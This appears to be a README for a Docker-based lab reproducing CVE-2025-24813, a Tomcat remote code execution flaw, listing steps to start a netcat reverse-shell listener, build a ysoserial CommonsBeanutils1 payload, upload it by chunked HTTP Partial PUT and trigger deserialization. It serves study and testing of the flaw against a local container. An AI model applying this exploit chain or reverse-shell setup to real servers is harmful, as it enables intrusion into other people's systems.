Share 
## https://sploitus.com/exploit?id=D3C1F211-5F09-5911-94C6-35C116BCCCBF
---
tags: [tomcat, cve-2025-24813, java, rce, reverse-shell, lab]
title: πŸ§ͺ CVE-2025-24813 Tomcat RCE Lab (Docker + ysoserial)
---

πŸ§ͺ **CVE-2025-24813 Tomcat RCE Lab (Docker + ysoserial)**

This lab demonstrates remote code execution via unsafe Java deserialization in a Tomcat-hosted app that processes serialized session files. The full environment runs in Docker with a crafted reverse shell payload delivered via a Partial PUT request.

---

πŸ“ **Directory Layout**

```
.
β”œβ”€β”€ 0-run-tomcat.sh        # Build + run vulnerable Tomcat container
β”œβ”€β”€ 1-generate-revshell.sh # Start Netcat reverse shell listener
β”œβ”€β”€ 2-generate-payload.sh  # Generate ysoserial reverse shell payload
β”œβ”€β”€ 3-upload-file.sh       # Upload serialized payload via Partial PUT
β”œβ”€β”€ 4-exploit.sh           # Trigger deserialization endpoint
β”œβ”€β”€ readme.md              # This file
β”œβ”€β”€ source.sh              # Sets CALLBACK_IP, LISTENER_PORT, etc
β”œβ”€β”€ dummy-app/
β”‚   β”œβ”€β”€ src/
β”‚   β”‚   └── main/java/com/example/DeserializeServlet.java
β”‚   β”œβ”€β”€ pom.xml
β”‚   └── Dockerfile
```

---

βš™οΈ **Prerequisites**

Install Java and Netcat:

```
brew install openjdk netcat
```

Ensure you’re using JDK 11+ and allow unsafe module access via `--add-opens`.

---

🧨 **Exploit Flow**

1. πŸ›  Build and run vulnerable Tomcat  
2. 🐚 Start reverse shell listener  
3. πŸ’£ Generate ysoserial payload (`CommonsBeanutils1`)  
4. πŸ“€ Upload payload using HTTP Partial PUT  
5. 🎯 Trigger deserialization and catch shell  

---

πŸ§ͺ **Usage**

### 1. Build and run vulnerable Tomcat

```
bash 0-run-tomcat.sh
```

---

### 2. Set environment variables

Create a `source.sh` file like this:

```
export CALLBACK_IP="your.lan.ip"
export LISTENER_PORT=4444
export PAYLOAD_FILE="rev_shell.ser"
export TARGET_URL="http://localhost:8080/xxx-api/gopan.session"
export CHUNK_SIZE=100
```

Then source it:

```
source source.sh
```

---

### 3. Start reverse shell listener

In a separate terminal:

```
bash 1-generate-revshell.sh
```

This runs:

```
nc -lnvp 4444
```

---

### 4. Generate the payload

```
bash 2-generate-payload.sh
```

This will:

- Download `ysoserial.jar` if needed  
- Generate a `CommonsBeanutils1` payload with reverse shell  
- Save it as `rev_shell.ser`  

---

### 5. Upload the payload

```
bash 3-upload-file.sh
```

This script performs an HTTP Partial PUT upload in chunks using `Content-Range` headers.

---

### 6. Trigger the exploit

```
bash 4-exploit.sh
```

This hits:

```
http://localhost:8080/xxx-api/profile
```

Which deserializes the uploaded file and executes the payload.

> βœ… You’ll get a reverse shell in the Netcat terminal!

---

πŸ” **Debugging**

Inside the container:

```
docker exec -it vulnerable-tomcat bash
cd /usr/local/tomcat/webapps/xxx-api/
ls -l
```

Check if the file `/tmp/beanutils-worked` exists if testing with a safe payload.

---

πŸ’‘ **Notes**

- Payloads require `--add-opens` to bypass module restrictions in Java 11+
- Reverse shell might fail silently if `/bin/bash` isn’t available (try `/bin/sh`)
- You can safely test code execution with: `touch /tmp/rce-worked`

---

🧱 **Based On**

- [frohoff/ysoserial](https://github.com/frohoff/ysoserial)
- Apache Tomcat 9.x
- Java deserialization exploit chains (CommonsBeanutils1)

---